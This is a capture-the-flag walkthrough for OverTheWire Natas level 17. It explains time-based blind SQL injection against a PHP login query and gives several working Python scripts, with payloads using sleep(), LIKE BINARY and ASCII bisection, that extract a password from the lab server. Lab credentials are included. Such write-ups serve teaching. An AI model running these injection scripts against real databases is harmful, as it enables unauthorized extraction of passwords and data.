OverTheWire walkthrough: Natas level 17


Open level 17 and look at the page.


[screenshot: the level 17 page]


View the source code:


<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas17', '<censored>');
    mysqli_select_db($link, 'natas17');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysqli_query($link, $query);
    if($res) {
    if(mysqli_num_rows($res) > 0) {
        //echo "This user exists.<br>";
    } else {
        //echo "This user doesn't exist.<br>";
    }
    } else {
        //echo "Error in query.<br>";
    }

    mysqli_close($link);
} else {
?>


The key SQL query is the one built from $_REQUEST["username"] without any escaping:


[screenshot: the PHP source]



All three result branches are commented out, so nothing in the response tells us whether the query matched. For this kind of blind SQL injection I followed the approach from another write-up:


[screenshot: the referenced write-up's approach]


Whether the injected condition held is read from the response time: sleep(5) is only reached when everything before it in the WHERE clause is true (time-based blind injection).


SELECT * from users where username="natas18" and password like binary '%a%' and sleep(5) #"


The injected query takes the form above. The `#` comments out the closing double quote that index.php appends, `like binary` makes the LIKE comparison case-sensitive (a plain LIKE would treat 'a' and 'A' as equal), and the server only executes sleep(5) when the username exists and the password contains the character, so a response that takes at least 5 seconds means the guess was right.


The Python script is as follows:


import requests
from requests.auth import HTTPBasicAuth

# HTTP basic auth for the natas17 page (the natas17 password from the previous level)
Auth = HTTPBasicAuth('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
headers = {'content-type': 'application/x-www-form-urlencoded'}
filteredchars = ''
passwd = ''
allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'

# Pass 1: which characters occur anywhere in the password?
# Injected query: username="natas18" and password like binary '%<c>%' and sleep(1) #
# sleep(1) only runs when the LIKE matches, so a reply taking >= 1 s means <c> is present.
for char in allchars:
    payload = 'username=natas18%22+and+password+like+binary+%27%25{0}%25%27+and+sleep%281%29+%23'.format(char)
    r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)
    if r.elapsed.seconds >= 1:
        filteredchars = filteredchars + char
        print(filteredchars)

print(filteredchars)

# Pass 2: build the password one position at a time with a case-sensitive prefix match
# (password like binary '<known prefix><c>%'); the password is 32 characters long.
for i in range(0, 32):
    for char in filteredchars:
        payload = 'username=natas18%22%20and%20password%20like%20binary%20\'{0}%25\'%20and%20sleep(1)%23'.format(passwd + char)
        r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)
        if r.elapsed.seconds >= 1:
            passwd = passwd + char
            print(passwd)
            break


I ran the computation in VS Code.


Script for Python 3.10 (binary search on the ASCII code of each character, about 7 requests per position instead of one per candidate character):


# coding:utf-8
import requests

# natas17 credentials go in the URL (HTTP basic auth)
url = 'http://natas17:XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd@natas17.natas.labs.overthewire.org/index.php'
key = ''

# One character per iteration; MySQL MID() positions are 1-based and the password is 32 chars.
for i in range(1, 33):
    a = 32    # lowest printable ASCII code still possible
    c = 126   # highest printable ASCII code still possible
    while a < c:
        b = int((a + c) / 2)
        # Injected query: username="natas18" and if(b<ascii(mid(password,i,1)),sleep(10),1) and "" like ""
        # The server sleeps 10 s only when the i-th character is above b.
        payload = r'natas18" and if(%d<ascii(mid(password,%d,1)),sleep(10),1) and "" like "' % (b, i)
        try:
            requests.post(url=url, data={"username": payload}, timeout=10)
        except requests.exceptions.Timeout:
            # timed out => sleep(10) ran => character > b
            a = b + 1
            b = int((a + c) / 2)
            continue
        # answered quickly => character <= b
        c = b
    # when a == c the search has converged and b equals that value
    key += chr(b)
    print(key)


The only change is the delay, now 10 seconds; just wait patiently. Note that the script treats every requests Timeout as a "yes" answer, so a genuine network stall on one request would be misread as a character boundary and corrupt the rest of that position's search; if a character looks wrong, rerun that position.
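To show the technique as a whole, here is an added example that is not the original post's code: it generalizes both scripts above into one extractor with a pluggable timing oracle, so the search can be run offline against a constructed secret and compared query-for-query. The two payload builders reproduce the page's injection shapes; the offline oracle, the constructed FAKE_SECRET, the helper names, the double-check on a timeout and the SLEEP_SECONDS/timeout values are my assumptions, not the level's. Pointed at the real level it would use make_http_oracle with the natas17 basic-auth credentials.

```python
import re
from typing import Callable

SLEEP_SECONDS = 10   # delay the injected sleep() asks the server for
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
# Constructed secret for the offline oracle; it is NOT the real natas18 password.
FAKE_SECRET = "aB3dE5fG7hI9jK1lM2nO4pQ6rS8tU0vW"

Oracle = Callable[[str], bool]   # payload -> True if the reply was delayed


def prefix_payload(prefix: str) -> str:
    """First script's shape: sleep when the password starts with `prefix`.
    LIKE BINARY is case-sensitive; '#' comments out the closing quote index.php appends."""
    return "natas18\" and password like binary '%s%%' and sleep(%d) #" % (prefix, SLEEP_SECONDS)


def greater_than_payload(pos: int, threshold: int) -> str:
    """Second script's shape: sleep when the character at 1-based `pos` is above `threshold`."""
    return ('natas18" and if(%d<ascii(mid(password,%d,1)),sleep(%d),1) and "" like "'
            % (threshold, pos, SLEEP_SECONDS))


def make_http_oracle(url: str, auth, timeout: float = SLEEP_SECONDS / 2) -> Oracle:
    """Oracle against the real level (not exercised offline). A read timeout well
    below SLEEP_SECONDS keeps a slept reply far away from an ordinary one."""
    import requests  # imported lazily so the offline demo needs no extra package

    def oracle(payload: str) -> bool:
        try:
            requests.post(url, auth=auth, data={"username": payload}, timeout=timeout)
        except requests.exceptions.Timeout:
            return True
        return False
    return oracle


_GT = re.compile(r"if\((\d+)<ascii\(mid\(password,(\d+),1\)\),sleep")
_PREFIX = re.compile(r"like binary '([^']*)%' and sleep")


def make_fake_oracle(secret: str) -> Oracle:
    """Offline stand-in for the server: evaluates the two payload shapes above
    against `secret` the way MySQL would, with no network involved."""
    def oracle(payload: str) -> bool:
        m = _GT.search(payload)
        if m:
            threshold, pos = int(m.group(1)), int(m.group(2))
            code = ord(secret[pos - 1]) if pos <= len(secret) else 0  # ASCII('') is 0
            return threshold < code
        m = _PREFIX.search(payload)
        if m:
            return secret.startswith(m.group(1))  # prefix is alphanumeric, so no LIKE wildcards
        raise ValueError("unrecognised payload: " + payload)
    return oracle


def find_char(oracle: Oracle, pos: int, lo: int = 32, hi: int = 126, confirm: bool = True) -> int:
    """Binary search over printable ASCII. Invariant: lo <= code <= hi."""
    while lo < hi:
        mid = (lo + hi) // 2
        slow = oracle(greater_than_payload(pos, mid))
        if slow and confirm:
            # A timeout can also be a network stall; a real sleep() repeats, a stall rarely does.
            slow = oracle(greater_than_payload(pos, mid))
        if slow:
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_bisect(oracle: Oracle, length: int = 32) -> str:
    """Second script's strategy: ~7 queries per position regardless of charset."""
    return "".join(chr(find_char(oracle, i)) for i in range(1, length + 1))


def extract_linear(oracle: Oracle, length: int = 32, charset: str = CHARSET) -> str:
    """First script's strategy: extend the known prefix one charset member at a time."""
    found = ""
    for _ in range(length):
        for ch in charset:
            if oracle(prefix_payload(found + ch)):
                found += ch
                break
        else:
            break  # nothing matched: charset too small, or the value ended
    return found


def count_queries(strategy, secret: str = FAKE_SECRET):
    """Run a strategy offline and report (recovered value, number of queries sent)."""
    base, calls = make_fake_oracle(secret), [0]

    def counting(payload: str) -> bool:
        calls[0] += 1
        return base(payload)
    return strategy(counting), calls[0]


if __name__ == "__main__":
    for name, strategy in (("bisect", extract_bisect), ("linear", extract_linear)):
        value, n = count_queries(strategy)
        print("%s: %s in %d queries" % (name, value, n))
```

The offline run makes the trade-off concrete: the prefix-LIKE strategy needs one request per candidate character per position, while the ASCII bisection needs about seven per position whatever the alphabet, which is why the second script finishes in minutes even with a 10-second sleep. The double-check in find_char is the cheap defence against the misread-stall problem noted above.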


[screenshot: script output]


The password comes out as:


8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq


[screenshot: the recovered password]


Verify the password by logging in to natas18:


[screenshot: logging in to natas18 with the password]
